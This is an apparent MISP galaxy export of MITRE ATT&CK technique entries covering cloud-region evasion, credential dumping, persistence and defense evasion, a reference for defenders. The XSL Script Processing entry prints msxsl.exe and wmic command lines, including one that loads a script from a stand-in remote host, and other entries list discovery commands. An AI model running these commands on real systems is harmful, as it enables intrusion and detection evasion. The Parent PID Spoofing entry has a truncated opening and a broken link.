Unused/Unsupported Cloud Regions - T1535

Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)

The tag is: misp-galaxy:mitre-attack-pattern="Unused/Unsupported Cloud Regions - T1535"

Table 3470. Table References
Links
https://attack.mitre.org/techniques/T1535
https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc

Search Open Websites/Domains - T1593

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Open Websites/Domains - T1593"

Table 3471. Table References
Links
https://attack.mitre.org/techniques/T1593
https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
https://securitytrails.com/blog/google-hacking-techniques
https://www.exploit-db.com/google-hacking-database

Obtain booter/stressor subscription - T1396

Configure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain booter/stressor subscription - T1396"

Table 3472. Table References
Links
https://attack.mitre.org/techniques/T1396
https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/
https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

Application Window Discovery - T1010

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.

The tag is: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"

Table 3473. Table References
Links
https://attack.mitre.org/techniques/T1010

OS Credential Dumping - T1003

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

The tag is: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"

Table 3474. Table References
Links
https://attack.mitre.org/techniques/T1003
https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
https://github.com/mattifestation/PowerSploit
https://msdn.microsoft.com/library/cc228086.aspx
https://msdn.microsoft.com/library/dd207691.aspx
https://wiki.samba.org/index.php/DRSUAPI
http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
https://msdn.microsoft.com/library/cc237008.aspx
https://msdn.microsoft.com/library/cc245496.aspx
https://adsecurity.org/?p=1729

Winlogon Helper DLL - T1004

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)

Winlogon\Notify - points to notification package DLLs that handle Winlogon events
Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004"

View relationships graph

Winlogon Helper DLL - T1004 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

Table 3475. Table References
Links
https://attack.mitre.org/techniques/T1004
https://capec.mitre.org/data/definitions/579.html
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
https://technet.microsoft.com/en-us/sysinternals/bb963902

Modify System Partition - T1400

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.

Many Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.

The tag is: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400"

Table 3476. Table References
Links
https://attack.mitre.org/techniques/T1400
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html
https://source.android.com/security/verifiedboot/
https://www.apple.com/business/docs/iOS_Security_Guide.pdf

Compile After Delivery - T1500

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1500"

View relationships graph

Compile After Delivery - T1500 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 3477. Table References
Links
https://attack.mitre.org/techniques/T1500
https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

Direct Volume Access - T1006

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)

The tag is: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006"

Table 3478. Table References
Links
https://attack.mitre.org/techniques/T1006
http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

System Service Discovery - T1007

Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007"

Table 3479. Table References
Links
https://attack.mitre.org/techniques/T1007
https://capec.mitre.org/data/definitions/574.html

Taint Shared Content - T1080

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary’s code on a remote system. Adversaries may use tainted shared content to move laterally.

A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user’s expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)

Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.

The tag is: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080"

Table 3480. Table References
Links
https://attack.mitre.org/techniques/T1080
https://capec.mitre.org/data/definitions/562.html
https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html

Security Support Provider - T1101

Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1101"

View relationships graph

Security Support Provider - T1101 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005" with estimative-language:likelihood-probability="almost-certain"

Table 3481. Table References
Links
https://attack.mitre.org/techniques/T1101
http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
https://technet.microsoft.com/en-us/library/dn408187.aspx

Peripheral Device Discovery - T1120

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

The tag is: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"

Table 3482. Table References
Links
https://attack.mitre.org/techniques/T1120
https://capec.mitre.org/data/definitions/646.html

Password Policy Discovery - T1201

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).

Password policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS (Citation: AWS GetPasswordPolicy).

The tag is: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201"

Table 3483. Table References
Links
https://attack.mitre.org/techniques/T1201
https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu
https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines
https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html

Analyze business processes - T1301

Business processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze business processes - T1301"

Table 3484. Table References
Links
https://attack.mitre.org/techniques/T1301

Install Root Certificate - T1130

Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)

The tag is: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130"

View relationships graph

Install Root Certificate - T1130 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 3485. Table References
Links
https://attack.mitre.org/techniques/T1130
https://capec.mitre.org/data/definitions/479.html
https://en.wikipedia.org/wiki/Root_certificate
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
https://objective-see.com/blog/blog_0x26.html
https://docs.microsoft.com/sysinternals/downloads/sigcheck
https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Modify Existing Service - T1031

Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031"

View relationships graph

Modify Existing Service - T1031 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 3486. Table References
Links
https://attack.mitre.org/techniques/T1031
https://capec.mitre.org/data/definitions/551.html
https://twitter.com/r0wdy_/status/936365549553991680
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)
https://technet.microsoft.com/en-us/sysinternals/bb963902

Device Administrator Permissions - T1401

Adversaries may request device administrator permissions to perform malicious actions.

By abusing the device administration API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Device Lockout](https://attack.mitre.org/techniques/T1446), factory resetting the device to [Delete Device Data](https://attack.mitre.org/techniques/T1447) and any traces of the malware, disabling all of the device’s cameras, or make it more difficult to uninstall the app.(Citation: Android DeviceAdminInfo)

Device administrators must be approved by the user at runtime, with a system popup showing which of the actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

The tag is: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401"

Table 3487. Table References
Links
https://attack.mitre.org/techniques/T1401
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html
https://developer.android.com/reference/android/app/admin/DeviceAdminInfo

Ingress Tool Transfer - T1105

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

The tag is: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"

Table 3488. Table References
Links
https://attack.mitre.org/techniques/T1105
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Graphical User Interface - T1061

This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.

The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system’s GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.

The tag is: misp-galaxy:mitre-attack-pattern="Graphical User Interface - T1061"

Table 3489. Table References
Links
https://attack.mitre.org/techniques/T1061
https://en.wikipedia.org/wiki/Run_command

Modify System Image - T1601

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

The tag is: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601"

Table 3490. Table References
Links
https://attack.mitre.org/techniques/T1601
https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

Application Deployment Software - T1017

Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.

Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The tag is: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017"

View relationships graph

Application Deployment Software - T1017 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 3491. Table References
Links
https://attack.mitre.org/techniques/T1017
https://capec.mitre.org/data/definitions/187.html

Application Layer Protocol - T1071

Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

The tag is: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071"

Table 3492. Table References
Links
https://attack.mitre.org/techniques/T1071
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Credentials in Files - T1081

Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081"

View relationships graph

Credentials in Files - T1081 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 3493. Table References
Links
https://attack.mitre.org/techniques/T1081
https://capec.mitre.org/data/definitions/639.html
http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html
http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx
https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

Remote System Discovery - T1018

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) in order to discover the hostname to IP address mappings of remote systems.

The tag is: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018"

Table 3494. Table References
Links
https://attack.mitre.org/techniques/T1018
https://capec.mitre.org/data/definitions/292.html
https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Indirect Command Execution - T1202

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)

Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202"

Table 3495. Table References
Links
https://attack.mitre.org/techniques/T1202
https://twitter.com/vector_sec/status/896049052642533376
https://twitter.com/Evi1cg/status/935027922397573120
https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe

XSL Script Processing - T1220

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)

<code>msxsl.exe customers[.]xml script[.]xsl</code>
<code>msxsl.exe script[.]xsl script[.]xsl</code>
<code>msxsl.exe script[.]jpeg script[.]jpeg</code>

Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)

Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>

The tag is: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220"

Table 3496. Table References
Links
https://attack.mitre.org/techniques/T1220
https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
https://www.microsoft.com/download/details.aspx?id=21714
https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
https://lolbas-project.github.io/lolbas/Binaries/Wmic/
https://twitter.com/dez_/status/986614411711442944

Standard Cryptographic Protocol - T1032

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032"

View relationships graph

Standard Cryptographic Protocol - T1032 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 3497. Table References
Links
https://attack.mitre.org/techniques/T1032
http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840
https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html
https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Derive intelligence requirements - T1230

Leadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)

The tag is: misp-galaxy:mitre-attack-pattern="Derive intelligence requirements - T1230"

Table 3498. Table References
Links
https://attack.mitre.org/techniques/T1230

Custom Cryptographic Protocol - T1024

Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.

Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.

Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)

The tag is: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024"

View relationships graph

Custom Cryptographic Protocol - T1024 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 3499. Table References
Links
https://attack.mitre.org/techniques/T1024
https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf
https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Domain Generation Algorithms - T1520

Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)

DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1520"

Table 3500. Table References
Links
https://attack.mitre.org/techniques/T1520
https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/
https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

Parent PID Spoofing - T1502

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](Rundll32(https://attack.mitre.org/techniques/T1085) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Execution through API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1502"

View relationships graph

Parent PID Spoofing - T1502 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004" with estimative-language:likelihood-probability="almost-certain"

Table 3501. Table References
Links
https://attack.mitre.org/techniques/T1502
https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/
https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works
https://www.countercept.com/blog/detecting-parent-pid-spoofing/
https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/
https://blog.xpnsec.com/becoming-system/
https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
